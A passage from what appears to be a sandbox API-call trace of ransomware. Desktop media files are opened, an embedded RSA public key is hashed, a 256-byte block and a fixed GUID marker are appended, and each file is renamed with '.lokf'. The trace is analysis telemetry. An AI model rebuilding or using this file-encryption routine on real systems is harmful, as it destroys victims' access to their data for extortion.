lpUsedDefaultChar=0x0) returned 41 [0058.416] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.416] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.416] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.416] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.416] CloseHandle (hObject=0x5cc) returned 1 [0058.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.417] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1jqP 8uN4qhj8sMm4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1jqp 8un4qhj8smm4.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1jqP 8uN4qhj8sMm4.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1jqp 8un4qhj8smm4.flv.lokf")) returned 1 [0058.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.418] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.419] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc40c02d0, ftCreationTime.dwHighDateTime=0x1d4c6ec, ftLastAccessTime.dwLowDateTime=0x4ad91180, ftLastAccessTime.dwHighDateTime=0x1d4cf9a, ftLastWriteTime.dwLowDateTime=0x4ad91180, ftLastWriteTime.dwHighDateTime=0x1d4cf9a, nFileSizeHigh=0x0, nFileSizeLow=0xda90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Zw20eF9M7.mp4", cAlternateFileName="1ZW20E~1.MP4")) returned 1 [0058.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Zw20eF9M7.mp4") returned=".mp4" [0058.419] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Zw20eF9M7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1zw20ef9m7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.419] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=55952) returned 1 [0058.419] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.421] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xda6a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.421] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.422] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.422] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xda90, lpOverlapped=0x0) returned 1 [0058.422] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.422] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.422] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.423] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.423] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.423] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.423] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.423] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.423] GetLastError () returned 0x0 [0058.423] SetLastError (dwErrCode=0x0) [0058.423] GetLastError () returned 0x0 [0058.423] SetLastError (dwErrCode=0x0) [0058.423] GetLastError () returned 0x0 [0058.423] SetLastError (dwErrCode=0x0) [0058.424] GetLastError () returned 0x0 [0058.424] SetLastError (dwErrCode=0x0) [0058.424] GetLastError () returned 0x0 [0058.424] SetLastError (dwErrCode=0x0) [0058.424] GetLastError () returned 0x0 [0058.424] SetLastError (dwErrCode=0x0) [0058.424] GetLastError () returned 0x0 [0058.424] SetLastError (dwErrCode=0x0) [0058.424] GetLastError () returned 0x0 [0058.424] SetLastError (dwErrCode=0x0) [0058.424] GetLastError () returned 0x0 [0058.424] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.424] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.424] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.424] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.424] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.424] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.424] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.424] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xda90) returned 0x9c82710 [0058.424] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298338 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac20 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298848 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ace0 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac50 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aba8 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x3292fe8 [0058.425] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aba8 | out: hHeap=0x660000) returned 1 [0058.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949d0 | out: hHeap=0x660000) returned 1 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aba8 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6ac50 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0058.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aba8 | out: hHeap=0x660000) returned 1 [0058.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.426] GetCurrentThreadId () returned 0x9e0 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c2810 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.426] GetCurrentThreadId () returned 0x9e0 [0058.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.426] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xda90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.426] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.427] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.427] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.427] CloseHandle (hObject=0x5cc) returned 1 [0058.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.428] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Zw20eF9M7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1zw20ef9m7.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Zw20eF9M7.mp4.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1zw20ef9m7.mp4.lokf")) returned 1 [0058.429] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9b17e0, ftCreationTime.dwHighDateTime=0x1d4d455, ftLastAccessTime.dwLowDateTime=0x31724950, ftLastAccessTime.dwHighDateTime=0x1d4c7f7, ftLastWriteTime.dwLowDateTime=0x31724950, ftLastWriteTime.dwHighDateTime=0x1d4c7f7, nFileSizeHigh=0x0, nFileSizeLow=0x3974, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1zXBPnB.gif", cAlternateFileName="")) returned 1 [0058.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.429] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1zXBPnB.gif") returned=".gif" [0058.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1zXBPnB.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1zxbpnb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.429] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=14708) returned 1 [0058.429] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.431] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x394e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.431] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.432] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x3974, lpOverlapped=0x0) returned 1 [0058.432] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.432] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.432] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.432] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.433] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.433] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.433] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.433] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.433] GetLastError () returned 0x0 [0058.433] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.433] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.433] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.433] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.433] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.434] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.434] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3974, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.434] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.434] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.434] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.434] CloseHandle (hObject=0x5cc) returned 1 [0058.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.435] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1zXBPnB.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1zxbpnb.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1zXBPnB.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1zxbpnb.gif.lokf")) returned 1 [0058.436] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4cdc390, ftCreationTime.dwHighDateTime=0x1d4d3f5, ftLastAccessTime.dwLowDateTime=0xabb3d040, ftLastAccessTime.dwHighDateTime=0x1d4d499, ftLastWriteTime.dwLowDateTime=0xabb3d040, ftLastWriteTime.dwHighDateTime=0x1d4d499, nFileSizeHigh=0x0, nFileSizeLow=0x9674, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4UyQPASLT.wav", cAlternateFileName="4UYQPA~1.WAV")) returned 1 [0058.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.436] PathFindExtensionW 